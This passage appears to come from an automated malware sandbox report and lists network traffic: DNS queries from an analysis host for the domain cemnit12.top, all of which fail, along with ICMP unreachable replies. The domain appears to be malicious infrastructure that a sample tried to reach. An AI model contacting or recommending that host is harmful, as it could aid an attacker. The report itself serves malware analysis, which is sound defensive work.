                                          Oct 13, 2021 03:21:43.019057989 CEST6242053192.168.2.48.8.8.8
                                          Oct 13, 2021 03:21:43.851013899 CEST53591728.8.8.8192.168.2.4
                                          Oct 13, 2021 03:21:44.060889006 CEST6242053192.168.2.48.8.8.8
                                          Oct 13, 2021 03:21:44.115537882 CEST53624208.8.8.8192.168.2.4
                                          Oct 13, 2021 03:21:45.854366064 CEST53624208.8.8.8192.168.2.4
                                          Oct 13, 2021 03:21:48.075043917 CEST6057953192.168.2.48.8.8.8
                                          Oct 13, 2021 03:21:49.092323065 CEST6057953192.168.2.48.8.8.8
                                          Oct 13, 2021 03:21:49.850893974 CEST53605798.8.8.8192.168.2.4
                                          Oct 13, 2021 03:21:49.974162102 CEST5018353192.168.2.48.8.8.8
                                          Oct 13, 2021 03:21:50.210850954 CEST53605798.8.8.8192.168.2.4
                                          Oct 13, 2021 03:21:51.030142069 CEST5018353192.168.2.48.8.8.8
                                          Oct 13, 2021 03:21:51.072808981 CEST53501838.8.8.8192.168.2.4
                                          Oct 13, 2021 03:21:52.136120081 CEST53501838.8.8.8192.168.2.4
                                          Oct 13, 2021 03:21:54.113473892 CEST5591653192.168.2.48.8.8.8
                                          Oct 13, 2021 03:21:55.124711037 CEST5591653192.168.2.48.8.8.8
                                          Oct 13, 2021 03:21:55.217227936 CEST53559168.8.8.8192.168.2.4
                                          Oct 13, 2021 03:21:56.197609901 CEST53559168.8.8.8192.168.2.4
                                          Oct 13, 2021 03:21:58.650206089 CEST5275253192.168.2.48.8.8.8
                                          Oct 13, 2021 03:21:59.686672926 CEST5275253192.168.2.48.8.8.8
                                          Oct 13, 2021 03:21:59.739356995 CEST53527528.8.8.8192.168.2.4
                                          Oct 13, 2021 03:22:00.993825912 CEST53527528.8.8.8192.168.2.4
                                          Oct 13, 2021 03:22:03.208611965 CEST6054253192.168.2.48.8.8.8
                                          Oct 13, 2021 03:22:04.203003883 CEST6054253192.168.2.48.8.8.8
                                          Oct 13, 2021 03:22:04.321183920 CEST53605428.8.8.8192.168.2.4
                                          Oct 13, 2021 03:22:05.278219938 CEST53605428.8.8.8192.168.2.4
                                          Oct 13, 2021 03:22:08.183978081 CEST6068953192.168.2.48.8.8.8
                                          Oct 13, 2021 03:22:09.187773943 CEST6068953192.168.2.48.8.8.8
                                          Oct 13, 2021 03:22:09.427354097 CEST53606898.8.8.8192.168.2.4
                                          Oct 13, 2021 03:22:09.558547974 CEST6420653192.168.2.48.8.8.8
                                          Oct 13, 2021 03:22:10.380769014 CEST53606898.8.8.8192.168.2.4
                                          Oct 13, 2021 03:22:10.594079018 CEST6420653192.168.2.48.8.8.8
                                          Oct 13, 2021 03:22:10.836510897 CEST53642068.8.8.8192.168.2.4
                                          Oct 13, 2021 03:22:10.961965084 CEST5090453192.168.2.48.8.8.8
                                          Oct 13, 2021 03:22:11.515616894 CEST53642068.8.8.8192.168.2.4
                                          Oct 13, 2021 03:22:12.000963926 CEST5090453192.168.2.48.8.8.8
                                          Oct 13, 2021 03:22:12.187814951 CEST53509048.8.8.8192.168.2.4
                                          Oct 13, 2021 03:22:13.810981989 CEST53509048.8.8.8192.168.2.4
                                          Oct 13, 2021 03:22:16.967132092 CEST5752553192.168.2.48.8.8.8
                                          Oct 13, 2021 03:22:17.969856024 CEST5752553192.168.2.48.8.8.8
                                          Oct 13, 2021 03:22:18.229638100 CEST53575258.8.8.8192.168.2.4
                                          Oct 13, 2021 03:22:19.216985941 CEST53575258.8.8.8192.168.2.4
                                          Oct 13, 2021 03:22:21.821299076 CEST5381453192.168.2.48.8.8.8
                                          Oct 13, 2021 03:22:22.959636927 CEST5381453192.168.2.48.8.8.8
                                          Oct 13, 2021 03:22:23.716187954 CEST53538148.8.8.8192.168.2.4
                                          Oct 13, 2021 03:22:24.749830961 CEST53538148.8.8.8192.168.2.4
                                          Oct 13, 2021 03:22:28.369976044 CEST6283353192.168.2.48.8.8.8
                                          Oct 13, 2021 03:22:29.392435074 CEST6283353192.168.2.48.8.8.8
                                          Oct 13, 2021 03:22:29.688690901 CEST53628338.8.8.8192.168.2.4
                                          Oct 13, 2021 03:22:29.810125113 CEST4994453192.168.2.48.8.8.8
                                          Oct 13, 2021 03:22:30.705342054 CEST53628338.8.8.8192.168.2.4
                                          Oct 13, 2021 03:22:30.845782995 CEST4994453192.168.2.48.8.8.8
                                          Oct 13, 2021 03:22:31.735200882 CEST53499448.8.8.8192.168.2.4
                                          Oct 13, 2021 03:22:31.870522022 CEST6330053192.168.2.48.8.8.8
                                          Oct 13, 2021 03:22:32.411879063 CEST53499448.8.8.8192.168.2.4
                                          Oct 13, 2021 03:22:32.892729998 CEST6330053192.168.2.48.8.8.8
                                          Oct 13, 2021 03:22:33.751461983 CEST53633008.8.8.8192.168.2.4
                                          Oct 13, 2021 03:22:34.170511007 CEST53633008.8.8.8192.168.2.4
                                          Oct 13, 2021 03:22:37.560188055 CEST6144953192.168.2.48.8.8.8
                                          Oct 13, 2021 03:22:38.597229958 CEST6144953192.168.2.48.8.8.8
                                          Oct 13, 2021 03:22:38.754662037 CEST53614498.8.8.8192.168.2.4
                                          Oct 13, 2021 03:22:38.867126942 CEST5127553192.168.2.48.8.8.8
                                          Oct 13, 2021 03:22:39.874382973 CEST53614498.8.8.8192.168.2.4
                                          Oct 13, 2021 03:22:39.893666029 CEST5127553192.168.2.48.8.8.8
                                          Oct 13, 2021 03:22:40.148868084 CEST53512758.8.8.8192.168.2.4
                                          Oct 13, 2021 03:22:40.276031017 CEST6349253192.168.2.48.8.8.8
                                          Oct 13, 2021 03:22:41.080971956 CEST53512758.8.8.8192.168.2.4
                                          Oct 13, 2021 03:22:41.299756050 CEST6349253192.168.2.48.8.8.8
                                          Oct 13, 2021 03:22:41.582231998 CEST53634928.8.8.8192.168.2.4
                                          Oct 13, 2021 03:22:41.752464056 CEST5894553192.168.2.48.8.8.8
                                          Oct 13, 2021 03:22:42.795219898 CEST53634928.8.8.8192.168.2.4
                                          Oct 13, 2021 03:22:42.799962044 CEST5894553192.168.2.48.8.8.8
                                          Oct 13, 2021 03:22:43.025391102 CEST53589458.8.8.8192.168.2.4
                                          Oct 13, 2021 03:22:43.141012907 CEST6077953192.168.2.48.8.8.8
                                          Oct 13, 2021 03:22:44.143676043 CEST6077953192.168.2.48.8.8.8
                                          Oct 13, 2021 03:22:44.356070042 CEST53607798.8.8.8192.168.2.4
                                          Oct 13, 2021 03:22:44.497792959 CEST6401453192.168.2.48.8.8.8
                                          Oct 13, 2021 03:22:45.078459024 CEST53589458.8.8.8192.168.2.4
                                          Oct 13, 2021 03:22:45.534514904 CEST6401453192.168.2.48.8.8.8
                                          Oct 13, 2021 03:22:46.001868010 CEST53607798.8.8.8192.168.2.4
                                          Oct 13, 2021 03:22:46.397176027 CEST53640148.8.8.8192.168.2.4
                                          Oct 13, 2021 03:22:46.510869980 CEST5709153192.168.2.48.8.8.8
                                          Oct 13, 2021 03:22:46.729011059 CEST53640148.8.8.8192.168.2.4
                                          Oct 13, 2021 03:22:47.550338984 CEST5709153192.168.2.48.8.8.8
                                          Oct 13, 2021 03:22:48.407321930 CEST53570918.8.8.8192.168.2.4
                                          Oct 13, 2021 03:22:49.749732018 CEST53570918.8.8.8192.168.2.4
                                          Oct 13, 2021 03:22:52.227858067 CEST5590453192.168.2.48.8.8.8
                                          Oct 13, 2021 03:22:53.238090038 CEST5590453192.168.2.48.8.8.8
                                          Oct 13, 2021 03:22:53.322173119 CEST53559048.8.8.8192.168.2.4
                                          Oct 13, 2021 03:22:54.397630930 CEST53559048.8.8.8192.168.2.4

                                          ICMP Packets

                                          TimestampSource IPDest IPChecksumCodeType
                                          Oct 13, 2021 03:21:02.389161110 CEST192.168.2.48.8.8.8cff0(Port unreachable)Destination Unreachable
                                          Oct 13, 2021 03:21:07.457890987 CEST192.168.2.48.8.8.8cff0(Port unreachable)Destination Unreachable
                                          Oct 13, 2021 03:21:12.695169926 CEST192.168.2.48.8.8.8cff0(Port unreachable)Destination Unreachable
                                          Oct 13, 2021 03:21:14.200414896 CEST192.168.2.48.8.8.8cff0(Port unreachable)Destination Unreachable
                                          Oct 13, 2021 03:21:14.984803915 CEST192.168.2.48.8.8.8cff0(Port unreachable)Destination Unreachable
                                          Oct 13, 2021 03:21:19.954612017 CEST192.168.2.48.8.8.8cff0(Port unreachable)Destination Unreachable
                                          Oct 13, 2021 03:21:21.183279037 CEST192.168.2.48.8.8.8cff0(Port unreachable)Destination Unreachable
                                          Oct 13, 2021 03:21:22.913073063 CEST192.168.2.48.8.8.8cff0(Port unreachable)Destination Unreachable
                                          Oct 13, 2021 03:21:28.288692951 CEST192.168.2.48.8.8.8cff0(Port unreachable)Destination Unreachable
                                          Oct 13, 2021 03:21:30.426520109 CEST192.168.2.48.8.8.8cff0(Port unreachable)Destination Unreachable
                                          Oct 13, 2021 03:21:31.997253895 CEST192.168.2.48.8.8.8cff0(Port unreachable)Destination Unreachable
                                          Oct 13, 2021 03:21:37.881751060 CEST192.168.2.48.8.8.8cff0(Port unreachable)Destination Unreachable
                                          Oct 13, 2021 03:21:39.010380030 CEST192.168.2.48.8.8.8cff0(Port unreachable)Destination Unreachable
                                          Oct 13, 2021 03:21:43.851295948 CEST192.168.2.48.8.8.8cff0(Port unreachable)Destination Unreachable
                                          Oct 13, 2021 03:21:45.854525089 CEST192.168.2.48.8.8.8cff0(Port unreachable)Destination Unreachable
                                          Oct 13, 2021 03:21:50.210954905 CEST192.168.2.48.8.8.8cff0(Port unreachable)Destination Unreachable
                                          Oct 13, 2021 03:21:52.137065887 CEST192.168.2.48.8.8.8cff0(Port unreachable)Destination Unreachable
                                          Oct 13, 2021 03:21:56.197743893 CEST192.168.2.48.8.8.8cff0(Port unreachable)Destination Unreachable
                                          Oct 13, 2021 03:22:00.995929003 CEST192.168.2.48.8.8.8cff0(Port unreachable)Destination Unreachable
                                          Oct 13, 2021 03:22:05.278378010 CEST192.168.2.48.8.8.8cff0(Port unreachable)Destination Unreachable
                                          Oct 13, 2021 03:22:10.380975962 CEST192.168.2.48.8.8.8cff0(Port unreachable)Destination Unreachable
                                          Oct 13, 2021 03:22:11.515794992 CEST192.168.2.48.8.8.8cff0(Port unreachable)Destination Unreachable
                                          Oct 13, 2021 03:22:13.811274052 CEST192.168.2.48.8.8.8cff0(Port unreachable)Destination Unreachable
                                          Oct 13, 2021 03:22:19.217307091 CEST192.168.2.48.8.8.8cff0(Port unreachable)Destination Unreachable
                                          Oct 13, 2021 03:22:24.750132084 CEST192.168.2.48.8.8.8cff0(Port unreachable)Destination Unreachable
                                          Oct 13, 2021 03:22:30.705503941 CEST192.168.2.48.8.8.8cff0(Port unreachable)Destination Unreachable
                                          Oct 13, 2021 03:22:32.411972046 CEST192.168.2.48.8.8.8cff0(Port unreachable)Destination Unreachable
                                          Oct 13, 2021 03:22:34.170780897 CEST192.168.2.48.8.8.8cff0(Port unreachable)Destination Unreachable
                                          Oct 13, 2021 03:22:39.874576092 CEST192.168.2.48.8.8.8cff0(Port unreachable)Destination Unreachable
                                          Oct 13, 2021 03:22:41.081108093 CEST192.168.2.48.8.8.8cff0(Port unreachable)Destination Unreachable
                                          Oct 13, 2021 03:22:42.795458078 CEST192.168.2.48.8.8.8cff0(Port unreachable)Destination Unreachable
                                          Oct 13, 2021 03:22:45.078603029 CEST192.168.2.48.8.8.8cff0(Port unreachable)Destination Unreachable
                                          Oct 13, 2021 03:22:46.003920078 CEST192.168.2.48.8.8.8cff0(Port unreachable)Destination Unreachable
                                          Oct 13, 2021 03:22:49.749986887 CEST192.168.2.48.8.8.8cff0(Port unreachable)Destination Unreachable
                                          Oct 13, 2021 03:22:54.398039103 CEST192.168.2.48.8.8.8cff0(Port unreachable)Destination Unreachable

                                          DNS Queries

                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                          Oct 13, 2021 03:21:00.244450092 CEST192.168.2.48.8.8.80x6bccStandard query (0)cemnit12.topA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:21:01.308037996 CEST192.168.2.48.8.8.80x6bccStandard query (0)cemnit12.topA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:21:04.875261068 CEST192.168.2.48.8.8.80xc440Standard query (0)cemnit12.topA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:21:05.885540009 CEST192.168.2.48.8.8.80xc440Standard query (0)cemnit12.topA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:21:10.324683905 CEST192.168.2.48.8.8.80x9530Standard query (0)cemnit12.topA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:21:11.339392900 CEST192.168.2.48.8.8.80x9530Standard query (0)cemnit12.topA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:21:11.837393045 CEST192.168.2.48.8.8.80x95aeStandard query (0)cemnit12.topA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:21:12.839085102 CEST192.168.2.48.8.8.80x95aeStandard query (0)cemnit12.topA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:21:13.886396885 CEST192.168.2.48.8.8.80x95aeStandard query (0)cemnit12.topA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:21:17.879841089 CEST192.168.2.48.8.8.80x19ceStandard query (0)cemnit12.topA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:21:18.886455059 CEST192.168.2.48.8.8.80x19ceStandard query (0)cemnit12.topA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:21:19.066164017 CEST192.168.2.48.8.8.80xff97Standard query (0)cemnit12.topA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:21:20.106025934 CEST192.168.2.48.8.8.80xff97Standard query (0)cemnit12.topA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:21:20.515779972 CEST192.168.2.48.8.8.80x8cfaStandard query (0)cemnit12.topA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:21:21.544275999 CEST192.168.2.48.8.8.80x8cfaStandard query (0)cemnit12.topA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:21:25.910090923 CEST192.168.2.48.8.8.80xd6fdStandard query (0)cemnit12.topA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:21:26.934092045 CEST192.168.2.48.8.8.80xd6fdStandard query (0)cemnit12.topA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:21:27.128180981 CEST192.168.2.48.8.8.80x7b58Standard query (0)cemnit12.topA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:21:28.137290955 CEST192.168.2.48.8.8.80x7b58Standard query (0)cemnit12.topA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:21:28.338900089 CEST192.168.2.48.8.8.80x8496Standard query (0)cemnit12.topA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:21:29.341252089 CEST192.168.2.48.8.8.80x8496Standard query (0)cemnit12.topA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:21:29.861408949 CEST192.168.2.48.8.8.80x8d29Standard query (0)cemnit12.topA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:21:30.903583050 CEST192.168.2.48.8.8.80x8d29Standard query (0)cemnit12.topA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:21:35.692908049 CEST192.168.2.48.8.8.80x9396Standard query (0)cemnit12.topA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:21:36.700745106 CEST192.168.2.48.8.8.80x9396Standard query (0)cemnit12.topA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:21:36.926614046 CEST192.168.2.48.8.8.80x1f01Standard query (0)cemnit12.topA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:21:37.936988115 CEST192.168.2.48.8.8.80x1f01Standard query (0)cemnit12.topA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:21:41.521255970 CEST192.168.2.48.8.8.80x12dbStandard query (0)cemnit12.topA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:21:42.544794083 CEST192.168.2.48.8.8.80x12dbStandard query (0)cemnit12.topA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:21:43.019057989 CEST192.168.2.48.8.8.80xf7e5Standard query (0)cemnit12.topA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:21:44.060889006 CEST192.168.2.48.8.8.80xf7e5Standard query (0)cemnit12.topA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:21:48.075043917 CEST192.168.2.48.8.8.80x9313Standard query (0)cemnit12.topA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:21:49.092323065 CEST192.168.2.48.8.8.80x9313Standard query (0)cemnit12.topA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:21:49.974162102 CEST192.168.2.48.8.8.80x82b8Standard query (0)cemnit12.topA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:21:51.030142069 CEST192.168.2.48.8.8.80x82b8Standard query (0)cemnit12.topA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:21:54.113473892 CEST192.168.2.48.8.8.80xd677Standard query (0)cemnit12.topA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:21:55.124711037 CEST192.168.2.48.8.8.80xd677Standard query (0)cemnit12.topA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:21:58.650206089 CEST192.168.2.48.8.8.80xa529Standard query (0)cemnit12.topA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:21:59.686672926 CEST192.168.2.48.8.8.80xa529Standard query (0)cemnit12.topA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:22:03.208611965 CEST192.168.2.48.8.8.80xd2c1Standard query (0)cemnit12.topA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:22:04.203003883 CEST192.168.2.48.8.8.80xd2c1Standard query (0)cemnit12.topA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:22:08.183978081 CEST192.168.2.48.8.8.80xc7bbStandard query (0)cemnit12.topA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:22:09.187773943 CEST192.168.2.48.8.8.80xc7bbStandard query (0)cemnit12.topA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:22:09.558547974 CEST192.168.2.48.8.8.80x8042Standard query (0)cemnit12.topA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:22:10.594079018 CEST192.168.2.48.8.8.80x8042Standard query (0)cemnit12.topA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:22:10.961965084 CEST192.168.2.48.8.8.80x1bddStandard query (0)cemnit12.topA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:22:12.000963926 CEST192.168.2.48.8.8.80x1bddStandard query (0)cemnit12.topA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:22:16.967132092 CEST192.168.2.48.8.8.80x2d34Standard query (0)cemnit12.topA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:22:17.969856024 CEST192.168.2.48.8.8.80x2d34Standard query (0)cemnit12.topA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:22:21.821299076 CEST192.168.2.48.8.8.80xb865Standard query (0)cemnit12.topA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:22:22.959636927 CEST192.168.2.48.8.8.80xb865Standard query (0)cemnit12.topA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:22:28.369976044 CEST192.168.2.48.8.8.80xad6Standard query (0)cemnit12.topA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:22:29.392435074 CEST192.168.2.48.8.8.80xad6Standard query (0)cemnit12.topA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:22:29.810125113 CEST192.168.2.48.8.8.80x3214Standard query (0)cemnit12.topA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:22:30.845782995 CEST192.168.2.48.8.8.80x3214Standard query (0)cemnit12.topA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:22:31.870522022 CEST192.168.2.48.8.8.80xa7deStandard query (0)cemnit12.topA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:22:32.892729998 CEST192.168.2.48.8.8.80xa7deStandard query (0)cemnit12.topA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:22:37.560188055 CEST192.168.2.48.8.8.80xf2cdStandard query (0)cemnit12.topA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:22:38.597229958 CEST192.168.2.48.8.8.80xf2cdStandard query (0)cemnit12.topA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:22:38.867126942 CEST192.168.2.48.8.8.80x2315Standard query (0)cemnit12.topA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:22:39.893666029 CEST192.168.2.48.8.8.80x2315Standard query (0)cemnit12.topA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:22:40.276031017 CEST192.168.2.48.8.8.80xeea3Standard query (0)cemnit12.topA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:22:41.299756050 CEST192.168.2.48.8.8.80xeea3Standard query (0)cemnit12.topA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:22:41.752464056 CEST192.168.2.48.8.8.80xc7e8Standard query (0)cemnit12.topA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:22:42.799962044 CEST192.168.2.48.8.8.80xc7e8Standard query (0)cemnit12.topA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:22:43.141012907 CEST192.168.2.48.8.8.80xa034Standard query (0)cemnit12.topA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:22:44.143676043 CEST192.168.2.48.8.8.80xa034Standard query (0)cemnit12.topA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:22:44.497792959 CEST192.168.2.48.8.8.80x1da0Standard query (0)cemnit12.topA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:22:45.534514904 CEST192.168.2.48.8.8.80x1da0Standard query (0)cemnit12.topA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:22:46.510869980 CEST192.168.2.48.8.8.80x524eStandard query (0)cemnit12.topA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:22:47.550338984 CEST192.168.2.48.8.8.80x524eStandard query (0)cemnit12.topA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:22:52.227858067 CEST192.168.2.48.8.8.80xae31Standard query (0)cemnit12.topA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:22:53.238090038 CEST192.168.2.48.8.8.80xae31Standard query (0)cemnit12.topA (IP address)IN (0x0001)

                                          DNS Answers

                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                          Oct 13, 2021 03:21:01.583400011 CEST8.8.8.8192.168.2.40x6bccServer failure (2)cemnit12.topnonenoneA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:21:02.389056921 CEST8.8.8.8192.168.2.40x6bccServer failure (2)cemnit12.topnonenoneA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:21:05.974519968 CEST8.8.8.8192.168.2.40xc440Server failure (2)cemnit12.topnonenoneA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:21:07.457341909 CEST8.8.8.8192.168.2.40xc440Server failure (2)cemnit12.topnonenoneA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:21:11.700870991 CEST8.8.8.8192.168.2.40x9530Server failure (2)cemnit12.topnonenoneA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:21:12.694979906 CEST8.8.8.8192.168.2.40x9530Server failure (2)cemnit12.topnonenoneA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:21:13.898669958 CEST8.8.8.8192.168.2.40x95aeServer failure (2)cemnit12.topnonenoneA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:21:14.200314045 CEST8.8.8.8192.168.2.40x95aeServer failure (2)cemnit12.topnonenoneA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:21:14.984724045 CEST8.8.8.8192.168.2.40x95aeServer failure (2)cemnit12.topnonenoneA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:21:18.955882072 CEST8.8.8.8192.168.2.40x19ceServer failure (2)cemnit12.topnonenoneA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:21:19.952100992 CEST8.8.8.8192.168.2.40x19ceServer failure (2)cemnit12.topnonenoneA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:21:20.366436005 CEST8.8.8.8192.168.2.40xff97Server failure (2)cemnit12.topnonenoneA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:21:21.183137894 CEST8.8.8.8192.168.2.40xff97Server failure (2)cemnit12.topnonenoneA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:21:21.881818056 CEST8.8.8.8192.168.2.40x8cfaServer failure (2)cemnit12.topnonenoneA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:21:22.912961960 CEST8.8.8.8192.168.2.40x8cfaServer failure (2)cemnit12.topnonenoneA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:21:27.011250019 CEST8.8.8.8192.168.2.40xd6fdServer failure (2)cemnit12.topnonenoneA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:21:28.199316978 CEST8.8.8.8192.168.2.40x7b58Server failure (2)cemnit12.topnonenoneA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:21:28.288079023 CEST8.8.8.8192.168.2.40xd6fdServer failure (2)cemnit12.topnonenoneA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:21:29.217339993 CEST8.8.8.8192.168.2.40x7b58Server failure (2)cemnit12.topnonenoneA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:21:29.749722958 CEST8.8.8.8192.168.2.40x8496Server failure (2)cemnit12.topnonenoneA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:21:30.426400900 CEST8.8.8.8192.168.2.40x8496Server failure (2)cemnit12.topnonenoneA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:21:30.939423084 CEST8.8.8.8192.168.2.40x8d29Server failure (2)cemnit12.topnonenoneA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:21:31.997054100 CEST8.8.8.8192.168.2.40x8d29Server failure (2)cemnit12.topnonenoneA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:21:36.781883001 CEST8.8.8.8192.168.2.40x9396Server failure (2)cemnit12.topnonenoneA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:21:37.881616116 CEST8.8.8.8192.168.2.40x9396Server failure (2)cemnit12.topnonenoneA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:21:37.987848997 CEST8.8.8.8192.168.2.40x1f01Server failure (2)cemnit12.topnonenoneA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:21:39.009149075 CEST8.8.8.8192.168.2.40x1f01Server failure (2)cemnit12.topnonenoneA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:21:42.901144028 CEST8.8.8.8192.168.2.40x12dbServer failure (2)cemnit12.topnonenoneA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:21:43.851013899 CEST8.8.8.8192.168.2.40x12dbServer failure (2)cemnit12.topnonenoneA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:21:44.115537882 CEST8.8.8.8192.168.2.40xf7e5Server failure (2)cemnit12.topnonenoneA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:21:45.854366064 CEST8.8.8.8192.168.2.40xf7e5Server failure (2)cemnit12.topnonenoneA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:21:49.850893974 CEST8.8.8.8192.168.2.40x9313Server failure (2)cemnit12.topnonenoneA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:21:50.210850954 CEST8.8.8.8192.168.2.40x9313Server failure (2)cemnit12.topnonenoneA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:21:51.072808981 CEST8.8.8.8192.168.2.40x82b8Server failure (2)cemnit12.topnonenoneA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:21:52.136120081 CEST8.8.8.8192.168.2.40x82b8Server failure (2)cemnit12.topnonenoneA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:21:55.217227936 CEST8.8.8.8192.168.2.40xd677Server failure (2)cemnit12.topnonenoneA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:21:56.197609901 CEST8.8.8.8192.168.2.40xd677Server failure (2)cemnit12.topnonenoneA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:21:59.739356995 CEST8.8.8.8192.168.2.40xa529Server failure (2)cemnit12.topnonenoneA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:22:00.993825912 CEST8.8.8.8192.168.2.40xa529Server failure (2)cemnit12.topnonenoneA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:22:04.321183920 CEST8.8.8.8192.168.2.40xd2c1Server failure (2)cemnit12.topnonenoneA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:22:05.278219938 CEST8.8.8.8192.168.2.40xd2c1Server failure (2)cemnit12.topnonenoneA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:22:09.427354097 CEST8.8.8.8192.168.2.40xc7bbServer failure (2)cemnit12.topnonenoneA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:22:10.380769014 CEST8.8.8.8192.168.2.40xc7bbServer failure (2)cemnit12.topnonenoneA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:22:10.836510897 CEST8.8.8.8192.168.2.40x8042Server failure (2)cemnit12.topnonenoneA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:22:11.515616894 CEST8.8.8.8192.168.2.40x8042Server failure (2)cemnit12.topnonenoneA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:22:12.187814951 CEST8.8.8.8192.168.2.40x1bddServer failure (2)cemnit12.topnonenoneA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:22:13.810981989 CEST8.8.8.8192.168.2.40x1bddServer failure (2)cemnit12.topnonenoneA (IP address)IN (0x0001)
                                          Oct 13, 2021 03:22:18.229638100 CEST8.8.8.8192.168.2.40x2d34Server failure (2)cemnit12.topnonenoneA (IP address)IN (0x0001)
